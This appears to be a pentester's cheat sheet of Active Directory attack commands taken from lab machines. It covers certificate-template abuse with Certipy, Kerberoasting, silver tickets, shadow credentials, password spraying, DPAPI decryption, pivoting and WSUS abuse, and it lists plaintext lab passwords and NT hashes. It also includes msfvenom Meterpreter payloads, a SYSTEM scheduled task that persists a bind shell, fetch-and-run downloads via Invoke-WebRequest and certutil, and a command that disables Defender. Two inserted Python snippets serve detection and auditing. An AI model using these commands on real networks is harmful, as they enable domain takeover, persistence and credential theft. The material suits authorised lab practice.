Certificate Attacks AD

Abusing ESC4 by turning the template into an ESC1-vulnerable one:

certipy-ad template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.126.132 -template SendaiComputer

Save the output as JSON that can be imported into BloodHound:

certipy-ad find -u 'peter.turner'@HYBRID.VL -p "b0cwR+G4Dzl_rw" -dc-ip 10.10.155.165 -old-bloodhound 

Use the upstream Certipy (installed in a venv) instead of the distro certipy-ad package, because it is updated with the latest ESC vulnerabilities:

python3 -m venv certipy-venv
source certipy-venv/bin/activate
pip install certipy-ad

certipy find -username ca_svc -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -vulnerable

Finding vulnerable certificate templates on the DC:

certipy-ad find -u 'levi.james'@PUPPY.HTB -p 'KingofAkron2025!' -dc-ip 10.10.11.70 -stdout -vulnerable

Finding vulnerable certificate templates on the DC using an exported Kerberos TGT:

certipy-ad find -u 'Rosie.Powell' -vulnerable -stdout -k -no-pass -target <FQDN>

Exploiting ESC1 (with NT hash) by requesting an Administrator certificate:

certipy-ad req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.228.165" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'dc01.hybrid.vl' -key-size 4096

Exploiting ESC1 (with password) by requesting an Administrator certificate:

certipy-ad req -u 'BANKING$' -p password -dc-ip 10.10.126.241 -ca retro-DC-CA -template RetroClients -upn administrator -target 10.10.126.241 -key-size 4096

Exploiting ESC16:

# Step 1: Read attributes of victim account (optional)
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read

# Step 2: Update the victim account's UPN to target administrator's sAMAccountName
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69'  -upn 'administrator'  -user 'ca_svc' update

# Step 3: Add a shadow credential (KeyCredential) to the victim account and obtain a TGT for it
certipy shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -account 'ca_svc' auto

# Export the credential cache for later use
export KRB5CCNAME=ca_svc.ccache

# Step 4: Request a certificate for the administrator user
certipy req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User'

# Step 5: Restore the victim account's original UPN
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

# Step 6: Authenticate as administrator using the certificate
certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
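Detection logic for the UPN manipulation in steps 2 and 5, as an added example that is not Certipy's code nor part of the original notes: it scans constructed Windows Security Event 4738 records (TargetUserName, UserPrincipalName and SubjectUserName fields) for a non-privileged account whose UPN is set to a protected sAMAccountName, and pairs that with the later restore of the original UPN. The protected-name list and the sample events are assumptions.

```python
"""Flag the ESC16-style UPN hijack: UPN set to a privileged name, later restored."""
from datetime import datetime, timedelta

# Assumed list of accounts whose names must never appear as another object's UPN.
PROTECTED_SAMACCOUNTNAMES = {"administrator"}

# Constructed sample events; field names follow Event ID 4738 ("A user account was
# changed"), where "-" means the attribute was not modified by that event.
SAMPLE_EVENTS = [
    {"EventID": 4738, "TimeCreated": "2025-06-01T10:00:05", "SubjectUserName": "p.agila",
     "TargetUserName": "ca_svc", "UserPrincipalName": "administrator"},
    {"EventID": 4738, "TimeCreated": "2025-06-01T10:01:30", "SubjectUserName": "p.agila",
     "TargetUserName": "ca_svc", "UserPrincipalName": "ca_svc@fluffy.htb"},
    {"EventID": 4738, "TimeCreated": "2025-06-01T11:00:00", "SubjectUserName": "hr.admin",
     "TargetUserName": "j.doe", "UserPrincipalName": "jane.doe@fluffy.htb"},
    {"EventID": 4738, "TimeCreated": "2025-06-01T11:05:00", "SubjectUserName": "hr.admin",
     "TargetUserName": "j.doe", "UserPrincipalName": "-"},
]


def upn_impersonates_protected(upn):
    """True if the UPN's local part equals a protected sAMAccountName (realm suffix optional)."""
    local = upn.split("@", 1)[0].lower()
    return local in PROTECTED_SAMACCOUNTNAMES


def find_upn_hijacks(events, restore_window=timedelta(minutes=30)):
    """Return one finding per suspicious UPN change.

    A finding is raised when a 4738 event sets the target's UPN to a protected name
    and the target is not that protected account itself.  If another 4738 for the
    same target rewrites the UPN within restore_window, it is recorded as the
    restore step (the clean-up in step 5 above), which is the full attack pattern.
    """
    changes = sorted(
        (e for e in events if e["EventID"] == 4738 and e["UserPrincipalName"] != "-"),
        key=lambda e: e["TimeCreated"],
    )
    findings = []
    for i, ev in enumerate(changes):
        target = ev["TargetUserName"].lower()
        if target in PROTECTED_SAMACCOUNTNAMES:
            continue  # the protected account changing its own UPN is not a hijack
        if not upn_impersonates_protected(ev["UserPrincipalName"]):
            continue
        t0 = datetime.fromisoformat(ev["TimeCreated"])
        restored_at = None
        for later in changes[i + 1:]:
            t1 = datetime.fromisoformat(later["TimeCreated"])
            if later["TargetUserName"].lower() == target and t1 - t0 <= restore_window:
                restored_at = later["TimeCreated"]
                break
        findings.append({
            "target": ev["TargetUserName"],
            "new_upn": ev["UserPrincipalName"],
            "changed_by": ev["SubjectUserName"],
            "changed_at": ev["TimeCreated"],
            "restored_at": restored_at,
        })
    return findings


if __name__ == "__main__":
    for hit in find_upn_hijacks(SAMPLE_EVENTS):
        print(hit)
```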

Relevant Boxes :


Username Enumeration

lookupsid.py for SID Bruteforcing - Windows

impacket-lookupsid anonymous@10.10.66.32 -no-pass

Filter only the usernames :

impacket-lookupsid anonymous@retro2.vl -no-pass | awk -F'\\\\| ' '/SidTypeUser/ {print $3}'

SMB Enumeration

Null-session share enumeration using cme:

crackmapexec smb 10.10.66.32 -u "a" -p "" --shares

Connecting to SMB with an exported Kerberos ticket, without credentials:

impacket-smbclient cicada.vl/Rosie.Powell@DC-JPQ225 -k -no-pass

Relevant Boxes :


LDAP Enumeration

ldapsearch -H ldaps://baby.vl:636/ -x -s base -b '' "(objectClass=*)" "*" +
ldapsearch -x -H ldap://10.10.95.143 -D '' -w '' -b "DC=baby,DC=vl" | grep sAMAccountName | awk -F: '{ print $2 }' |  awk '{ gsub(/ /,""); print }'

Credential Hunting

Searching for passwords in user Description fields in AD:

PS C:\> Get-DomainUser * |select samaccountname,description | ?{$_.Description -ne $null}

The same check with NetExec (the --users output includes the description field):

nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

Password Spraying

Windows Internal Password Spraying

We can use DomainPasswordSpray.ps1 or the Windows version of Kerbrute.

PS C:\> Invoke-DomainPasswordSpray -Password Welcome1

Static Binaries


SharpHound

SharpHound.exe -c All --zipfilename ILFREIGHT 

Evil-WinRM

Standard Login :

evil-winrm -i <target_ip> -u <username> -p <password>

PTH Login :

evil-winrm -i <target_ip> -u <username> -H <ntlm_hash>

Meterpreter Bind Shell / Windows

msfvenom -p windows/x64/meterpreter_bind_tcp LPORT=4444 -f exe -o bind_shell_x64.exe
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter_bind_tcp; set RHOST [target IP]; set LPORT 4444; run"

Useful for heavy pivoting, instead of relying on reverse shells plus port forwarding: once the bind shell is persisted, you can connect to the machine directly from the attacker box (Falcon).


Persist Bind Shell / Windows

schtasks /create /tn "BindShell" /tr "C:\Users\vfrank\Documents\bind_shell_x64.exe" /sc minute /mo 1 /ru SYSTEM

cleanup command :

schtasks /delete /tn "BindShell" /f

Ping Sweep

Linux :

for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done 

Windows (cmd) :

for /L %i in (1, 1, 254) do @ping 172.16.5.%i -n 1 -w 100 | findstr /C:"Reply from"

Windows (powershell) :

1..100 | % {"172.16.9.$($_): $(Test-Connection -count 1 -comp 172.16.9.$($_) -quiet)"}

Pivoting

Chisel - Socks Proxy

Attacker : Falcon

./chisel server -p 8000 --reverse

Victim / JumpBox

./chisel client <falcon_ip>:8000 R:socks

Reverse Port Forwarding for Reverse Shells

ssh -i dmz01_key -R Internal_VictimIP:443:0.0.0.0:7000 root@Pivot_Box -vN

Example :

msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.8.120 -f exe -o teams.exe LPORT=443
ssh -i dmz01_key -R 172.16.8.120:443:0.0.0.0:7000 root@10.129.203.111 -vN
┌──(destiny㉿falcon)-[/]
└─$ nc -lvp 7000

This SSH command sets up a remote forward for the reverse shell: port 443 on the pivot box's internal interface (172.16.8.120) is forwarded back to port 7000 on the attacker host, so the victim connects to the pivot on 443 and the connection lands on the attacker's nc listener.

Ligolo-ng

Single Pivot

sudo ip tuntap add user destiny mode tun ligolo  
sudo ip link set ligolo up
sudo ./proxy -selfcert
.\agent.exe -connect <AttackerKaliIP>:11601 -ignore-cert
session
start
ifconfig
sudo ip route add <InternalNetworkIP>/<xx> dev ligolo

Example:

sudo ip route add 172.16.5.0/24 dev ligolo

Double Pivot

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
.\agent.exe -connect <PivotBoxInterfaceIP>:11601 -ignore-cert -retry
sudo ip tuntap add user destiny mode tun ligolo2  
sudo ip link set ligolo2 up
sudo ip route add <InternalNetworkIP>/<xx> dev ligolo2

InternalNetworkIP = The IP address Range you want to access inside a Pivot

Cleanup command of the interfaces (Only use after finishing the work) :

sudo ip link set ligolo down && sudo ip tuntap del mode tun name ligolo
  • Alternatively, run the autoroute command in the Ligolo proxy console and select the tunnel; the routes through the interface are then added for you.

Transfer And Execution (To Windows / SMB Writable)

proxychains4 crackmapexec smb -u vagrant -p vagrant -d sevenkingdoms.local 192.168.8.241 --put-file /home/kali/Downloads/p1v0t.exe \\Windows\\Temp\\p1v0t.exe
proxychains4 crackmapexec smb -u vagrant -p vagrant -d sevenkingdoms.local 192.168.8.241 -x "\\Windows\\Temp\\p1v0t.exe"

This method works when we have credentials for a writable SMB share, and is similar to the psexec method.


Transfer And Execution (Linux > Windows)

sudo python3 -m http.server 80
Invoke-WebRequest -Uri http://10.10.15.224/meterpreter.exe -OutFile C:\Windows\Temp\meterpreter.exe
Start-Process -FilePath "C:\Windows\Temp\meterpreter.exe"

Transfer using SMB Shares (Linux > Windows)

Start Impacket SMB Server to share the current directory.

impacket-smbserver share $(pwd) -smb2support

Mount the SMB share to drive Z: on Windows.

net use Z: \\<kali-ip>\share

Copy the file to the SMB share.

copy C:\AVTest\KasperskyRemovalTool.exe Z:\

Verify the file on Kali.

ls

Disconnect the SMB share after transfer.

net use Z: /delete

File Transfer Using Certutil.exe

certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

File Transfer Using RDP and PTH Attack

Login with Drive Mounted :

xfreerdp /v:10.129.43.33 /u:username /p:'password' /drive:/opt/tools

Pass-The-Hash :

xfreerdp /v:10.129.43.33 /u:username /pth:'<ntlm_hash>' /drive:/opt/tools

Kerberoasting - Rubeus.exe

Rubeus.exe kerberoast /spn:MSSQLSvc/SQL01.inlanefreight.local:1433 /format:hashcat /nowrap

MSSQL

Enable xp_cmdshell

Method 1 (impacket-mssqlclient):

enable_xp_cmdshell

Method 2 :

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

RDP

Allow Remote Desktop Connections: Run the following command:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Enable Restricted Admin Mode for RDP (setting DisableRestrictedAdmin to 0 turns it on, which pass-the-hash over RDP needs):

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

xfreerdp :

xfreerdp /v:10.129.32.115 /u:htb-student /p:'HTB_@cademy_stdnt!' /cert:ignore /drive:home,"/home/destiny/tools-backup"

Abusing Bloodhound Findings

WriteOwner (PowerView)

Changed the ownership of the ca_svc account to the user ryan.

Set-DomainObjectOwner -Identity 'ca_svc' -OwnerIdentity 'ryan'
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set owner $TargetObject $ControlledPrincipal

Granted full control permissions (All rights) to ryan over the ca_svc account.

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ca_svc" -PrincipalIdentity "ryan"
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add genericAll $TargetObject $ControlledPrincipal

Changed the password of the ca_svc account to 'Password9999'.

$NewPassword = ConvertTo-SecureString 'Password9999' -AsPlainText -Force  
Set-DomainUserPassword -Identity 'ca_svc' -AccountPassword $NewPassword

Relevant Boxes :

ForceChangePassword

PS C:\> Import-Module .\PowerView.ps1
PS C:\> Set-DomainUserPassword -Identity <USERNAME> -AccountPassword (ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force) -Verbose

Example :

PS C:\> Import-Module .\PowerView.ps1
PS C:\> Set-DomainUserPassword -Identity ssmalls -AccountPassword (ConvertTo-SecureString 'Str0ngpass86!' -AsPlainText -Force) -Verbose
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"

Using a TGT when NTLM Authentication is disabled

bloodyAD -d mirage.htb --host dc01.mirage.htb -k ccache=mark.bbond.ccache -v DEBUG set password javier.mmarshall 'Password123##'

GenericWrite

Set-DomainObject to set a fake SPN on the target account.

PS C:\> Set-DomainObject -credential $Cred -Identity ttimmons -SET @{serviceprincipalname='acmetesting/LEGIT'} -Verbose

Perform a targeted Kerberoasting attack:

GetUserSPNs.py -dc-ip 172.16.8.3 INLANEFREIGHT.LOCAL/mssqladm -request-user ttimmons

Crack the hash using hashcat:

hashcat -m 13100 ttimmons_tgs /usr/share/wordlists/rockyou.txt

Same Attack using a Linux Host with targetedKerberoast.py

python3 targetedKerberoast.py -v -d 'DELEGATE.VL' -u 'A.Briggs' -p 'Pass' --request-user 'N.THOMPSON' --dc-ip 10.10.97.100


Relevant Boxes :

GenericAll

With GenericAll over a group, add the user to it (Windows):

PS C:\DotNetNuke\Portals\0> $group = Convert-NameToSid "Server Admins"
PS C:\DotNetNuke\Portals\0> Add-DomainGroupMember -Identity $group -Members 'ttimmons' -verbose

With GenericAll over a group, add the user to it (Linux):

net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

ReadGMSAPassword

netexec ldap 10.10.145.117  -u 'NODERED$' -p '' --gmsa

Relevant Boxes :

WriteDacl

Changing the password of the user GPOADM using PowerView :

add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"
$cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
set-domainuserpassword gpoadm -accountpassword $cred

Relevant Boxes :

AddAllowedToAct (When MachineQuota = 0)

Relevant Boxes :

Activating Disabled Accounts By Abusing GenericAll

(ADAM.SILVER User account is Disabled)

Save the content below to a file named enable.ldif:

dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 512

Use ldapmodify to enable the disabled account by abusing GenericAll:

ldapmodify -x -H ldap://10.129.62.170 -D 'ant.edwards@puppy.htb' -w 'Antman2025!' -f enable.ldif
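To see exactly what enable.ldif changes, here is an added example (not part of ldapmodify or the original notes) that parses the modify record, applies it to a constructed copy of the account with userAccountControl 514 (NORMAL_ACCOUNT + ACCOUNTDISABLE), and reports which flags were cleared or set. It also decodes the other commonly audited bits, such as DONT_REQ_PREAUTH, which the AS-REP roasting commands further down rely on; the starting entry value is an assumption.

```python
"""Decode userAccountControl and show the effect of an LDIF 'replace' on it."""

# Documented AD userAccountControl bits (subset worth auditing).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",  # the bit AS-REP roasting depends on
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Constructed: the disabled target account before the change (512 + 2 = 514).
ENTRY_BEFORE = {
    "dn": "CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB",
    "userAccountControl": "514",
}

# The enable.ldif content from the notes above, embedded verbatim.
ENABLE_LDIF = """dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 512
"""


def decode_uac(value):
    """Return the set of flag names set in a userAccountControl integer."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def parse_ldif_modify(text):
    """Parse one LDIF 'changetype: modify' record made of 'replace:' blocks.

    Returns (dn, {attribute: [values]}).  Only the subset of LDIF used on this
    page is supported; anything else raises ValueError instead of being guessed.
    """
    dn, ops, current = None, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":  # '-' separates change blocks in LDIF
            continue
        key, _, val = line.partition(":")
        key, val = key.strip(), val.strip()
        if key == "dn":
            dn = val
        elif key == "changetype":
            if val != "modify":
                raise ValueError("only changetype: modify is supported")
        elif key == "replace":
            current = val
            ops[current] = []
        elif current is not None and key == current:
            ops[current].append(val)
        else:
            raise ValueError(f"unexpected LDIF line: {raw!r}")
    if dn is None or not ops:
        raise ValueError("incomplete modify record")
    return dn, ops


def apply_uac_change(entry, ldif_text):
    """Apply the LDIF replace to a copy of entry and describe the userAccountControl delta."""
    dn, ops = parse_ldif_modify(ldif_text)
    if dn != entry["dn"]:
        raise ValueError("LDIF dn does not match the entry")
    new_entry = dict(entry)
    for attr, values in ops.items():
        new_entry[attr] = values[0] if len(values) == 1 else values
    before = decode_uac(int(entry["userAccountControl"]))
    after = decode_uac(int(new_entry["userAccountControl"]))
    return {"dn": dn, "cleared": before - after, "set": after - before, "entry": new_entry}
```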

Relevant Boxes :

Shadow Credentials abuse using Certipy

certipy shadow auto -username 'Haze-IT-Backup$@haze.htb' -hashes 723fd747a7523dbebfc5b1d3d759ffbf -account edward.martin -target dc01.haze.htb -ns 10.10.11.61

Relevant Boxes :


Creating PSCredential object to run commands without RDP

Creating a PSCredential object to be able to run commands as a user without having to RDP :

PS C:\> $SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword)

Example :

PS C:\> $SecPassword = ConvertTo-SecureString 'DBAilfreight1!' -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\mssqladm', $SecPassword)

ASREP-Roasting

Impacket :

GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users 

Impacket but without any userfiles:

impacket-GetNPUsers -dc-ip 10.10.10.161 -request 'htb.local/' -format hashcat

Kerberoasting

Listing SPN Accounts with GetUserSPNs.py

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

Requesting all TGS Tickets

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request 

Requesting a Single TGS ticket

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Bloodhound-python / RustHound-CE

sudo bloodhound-python -u 'bsmith' -p '<REDACTED>' -d inlanefreight.local -ns 10.10.101.57 -c All --zip

If using the server IP as the nameserver does not work, run dnschef and pass 127.0.0.1 as the nameserver.

rusthound-ce --domain haze.htb -u paul.taylor -p Ld@p_Auth_Sp1unk@2k24 -c All --zip

NFS Shares

List NFS Shares

showmount -e 10.10.173.102
/opt/share *

Mount NFS Share

sudo mount -t nfs -o vers=3,nolock 10.10.173.102:/opt/share /mnt/new_back

Unmount the specific NFS share.

umount ./target-NFS

DNS

NS request to the specific nameserver.

dig ns <domain.tld> @<nameserver>

ANY request to the specific nameserver.

dig any <domain.tld> @<nameserver>

AXFR request to the specific nameserver.

dig axfr <domain.tld> @<nameserver>

Subdomain brute forcing.

dnsenum --dnsserver <nameserver> --enum -p 0 -s 0 -o found_subdomains.txt -f ~/subdomains.list <domain.tld>

LDAP

Enumerating the password policy in a target Windows domain:

ldapsearch -H ldap://172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

Discovering users in a target Windows domain:

ldapsearch -x -H ldap://10.10.95.143 -D '' -w '' -b "DC=baby,DC=vl" | grep sAMAccountName | awk -F: '{ print $2 }' |  awk '{ gsub(/ /,""); print }'

Using the Python tool windapsearch.py to discover users in a target Windows domain:

./windapsearch.py --dc-ip 172.16.5.5 -u "" -U

Enumerating objects:

./windapsearch.py --dc-ip 10.10.10.161 -d htb.local --custom="objectClass=*" | tee objects.txt && awk 'NF{printf "%s ", $0; next}1' objects.txt > temp.txt && mv temp.txt objects.txt

Relevant Boxes:


Local File Inclusion (LFI)

Windows

?lfi=C:/WINDOWS/System32/drivers/etc/hosts

Windows Powershell

Adds the user destiny with the password password to the domain.

net user destiny password /add /domain

Adds the user destiny to the “Exchange Windows Permissions” group.

net group "Exchange Windows Permissions" /add destiny

Lists the members of the “Exchange Windows Permissions” group.

net group "Exchange Windows Permissions"

Disable Windows Defender

Set-MpPreference -DisableRealtimeMonitoring $true

Kerberos Attacks

Silver Tickets

In order to perform a silver ticket attack we require the following:

  • Domain SID
  • User NTLM hash (convert the plaintext password to NTLM using a browser-based tool when you have plaintext credentials)
  • SPN of the service account we currently have access to

Get the Domain SID from impacket’s lookupsid:

impacket-lookupsid breach.vl/svc_mssql:'Trustno1'@breach.vl

Forge the silver ticket for the user you need (example below: Administrator):

impacket-ticketer -nthash '69596C7AA1E8DAEE17F8E78870E25A5C' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -domain breach.vl -spn 'MSSQLSvc/breach.vl:1433' -user-id 500 Administrator

Export the saved ticket for Linux host based attacks:

export KRB5CCNAME=Administrator.ccache

Forge a ticket with Mimikatz (kerberos::golden, here scoped to the HTTP service on lusdc.lustrous.vl, so effectively a silver ticket) for the tony.ward user to access that host over HTTP:

kerberos::golden /domain:lustrous.vl /sid:S-1-5-21-2355092754-1584501958-1513963426 /target:lusdc.lustrous.vl /service:HTTP /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /user:tony.ward /id:1114 /ptt

Relevant Boxes :


URL File Attack

  • ntlm_theft can generate multiple types of NTLMv2 hash theft files.

Usage example :

python3 ntlm_theft.py -g all -s <kali ip> -f Important

Relevant Boxes :


Password Spray

Kerbrute :

kerbrute passwordspray -d cicada.vl --dc 10.10.110.102 users.txt Cicada123

Crackmapexec when NTLM is disabled :

crackmapexec smb DC-JPQ225 -u 'Rosie.Powell' -p 'Cicada123' -d cicada.vl -k

Relevant Boxes :


Connecting to ftp :

lftp ftp://anonymous:anonymous@bruno.vl     

Tree view directories + files :

lftp anonymous@bruno.vl:~> find

Download all folders + files to local machine

lftp anonymous@bruno.vl:~> mirror -c -e -n .

Mimikatz

Relevant Boxes :


smbpasswd

smbpasswd -r 10.10.95.143 -U Caroline.Robinson
impacket-smbpasswd sendai.vl/Elliot.Yates@dc.sendai.vl -newpass 'Password@123'

Relevant Boxes :


Windows Privilege Escalation

PrivescCheck.ps1

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Relevant Boxes :

SeEnableDelegationPrivilege

Relevant Boxes :


LAPS Password

Retrieve the clear-text local administrator password of a host (LAPS):

Get-LapsADPassword -Identity SRV -AsPlainText

Using pyLAPS to perform the same attack from a linux host :

python3 pyLAPS.py --action get --dc-ip 10.10.233.149 -u 'abbie.smith' -p 'CMe1x+nlRaaWEw'

Relevant Boxes :


CrackMapExec / NetExec

Specify the target $IP before any other args, e.g. cme ldap 10.10.11.174 -u admin -p admin. A range of IPs can be given as 192.168.1.1-23.

smb

  • Basic enumeration
crackmapexec smb $IP
  • Authentication (password or NT hash)
crackmapexec smb $IP -u '<USER>' -p '<PASS>'
crackmapexec smb $IP -u '<USER>' -H '<HASH>'
  • Use Kerberos auth (export the ccache file as KRB5CCNAME)
crackmapexec smb -k $IP
  • Dump password policy
crackmapexec smb --pass-pol $IP
  • List shares
crackmapexec smb --shares $IP

Get the users in the domain into a list using crackmapexec:

crackmapexec smb 172.16.7.3 -u 'AB920' -p 'weasal' --users >> users.txt

Filter out only the usernames into a list:

awk -F'\\\\' '{split($1, domain, "."); print tolower($2)"@"tolower(domain[1])"."tolower(domain[2])}' users.txt > new_users.txt && grep -oP '^\w+' new_users.txt > clean_users.txt
  • Bruteforce RIDs to find possible users
crackmapexec smb dev.local -u 'user' -p '' --rid-brute 
  • See if the users have username as the password
crackmapexec smb dev.local -u userlist -p userlist --no-bruteforce --continue-on-success
  • Using netexec spider_plus module to enumerate bulk SMB shares
netexec smb 10.10.103.3 -u 'null' -p '' -M spider_plus

ldap

  • List the modules you have
crackmapexec ldap -L
  • Get the MachineAccountQuota: the maximum number of machine accounts a user can create
crackmapexec ldap -u user -p pass -M maq
  • Check for Active Directory Certificate Service
crackmapexec ldap -u user -p pass -M adcs

To check for ADCS from the web server, browse to http://url/cert. If ADCS is running, use certipy to exploit it.

  • Check out trusts
crackmapexec ldap -u user -p pass -M enum_trusts

Abusing WSUS To Become Domain Admin

cmd.exe /c 'SharpWSUS.exe create /payload:"C:\Users\Administrator\Documents\PsExec64.exe" /args:"-accepteula -s -d cmd.exe  /c \" net user destiny Password@123 /add \"" /title:"Updating"'

Add the user to the local Administrators group on the DC:

cmd.exe /c 'SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d cmd.exe  /c \"net localgroup administrators destiny /add \"" /title:"Updating"'

Approve the update

Relevant Boxes :


CrackMapExec’s gpp Modules

crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_password

Decrypt DPAPI Credentials

Save the relevant files to the local vm :

Step 1: Decrypt the MasterKey using the user’s SID and known password:

impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'

This gave us the DPAPI decryption key.

Step 2: Use the key to decrypt the credential blob:

impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

This revealed the stored credentials decrypted.

Relevant Boxes :


Injecting Shadow Credentials

Exploiting Shadow Credentials. This technique allows abuse of the msDS-KeyCredentialLink attribute to authenticate as a user using forged certificates.

We used pywhisker to inject Shadow Credentials into the winrm_svc account. This was done from a Unix system as shown below:

pywhisker -u 'p.agila' -p 'prometheusx-303' -d "fluffy.htb" -t "winrm_svc" --dc-ip 10.10.11.69 -a add --filename winrm_svc --export PEM

After injecting the Shadow Credentials, we used PKINITtools to request a TGT for the winrm_svc user using the generated certificate and private key:

python3 ~/shared/tools-backup/PKINITtools/gettgtpkinit.py -cert-pem winrm_svc_cert.pem -key-pem winrm_svc_priv.pem fluffy.htb/winrm_svc winrm_svc.ccache

We then exported the Kerberos ticket for the current session:

┌──(destiny㉿falcon)-[~/…/HTB/Machines/fluffy/winrm_svc]
└─$ export KRB5CCNAME=winrm_svc.ccache 

Finally, we extracted the NT hash of the winrm_svc account using getnthash.py:

python3 ~/shared/tools-backup/PKINITtools/getnthash.py -key d915fcc021b8d07b2c3c753dd5fe88ad9ff62013307b522c79f79b9ceac9d557 fluffy.htb/winrm_svc

Relevant Boxes :


FFUF

Vhost Fuzzing:

ffuf -w /usr/share/wordlists/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb'

RID Bruteforce

Saving Domain users to a file:

netexec smb haze.htb -u paul.taylor -p 'password' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | cut -d' ' -f1 | tee domain_users

Relevant Boxes :


Generating KRB5 Config - NXC

┌──(destinyoo㉿dragon)-[~/shared/HTB/Machines/Haze]
└─$ nxc smb haze.htb -u 'Haze-IT-Backup$' -H 723fd747a7523dbebfc5b1d3d759ffbf --generate-krb5-file haze.krb
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [+] haze.htb\Haze-IT-Backup$:723fd747a7523dbebfc5b1d3d759ffbf 

┌──(destinyoo㉿dragon)-[~/shared/HTB/Machines/Haze]
└─$ cat haze.krb  

[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = HAZE.HTB

[realms]
    HAZE.HTB = {
        kdc = dc01.haze.htb
        admin_server = dc01.haze.htb
        default_domain = haze.htb
    }

[domain_realm]
    .haze.htb = HAZE.HTB
    haze.htb = HAZE.HTB

┌──(destinyoo㉿dragon)-[~/shared/HTB/Machines/Haze]
└─$ sudo cp haze.krb /etc/krb5.conf

TimeRoasting

https://github.com/SecuraBV/Timeroast

┌──(destinyoo㉿dragon)-[~/shared/tools-backup/Timeroast]
└─$ python3 timeroast.py 10.10.11.75 -o ~/shared/HTB/Machines/RustyKey/rustykey.hashes
┌──(destinyoo㉿dragon)-[~/shared/tools-backup/Timeroast/extra-scripts]
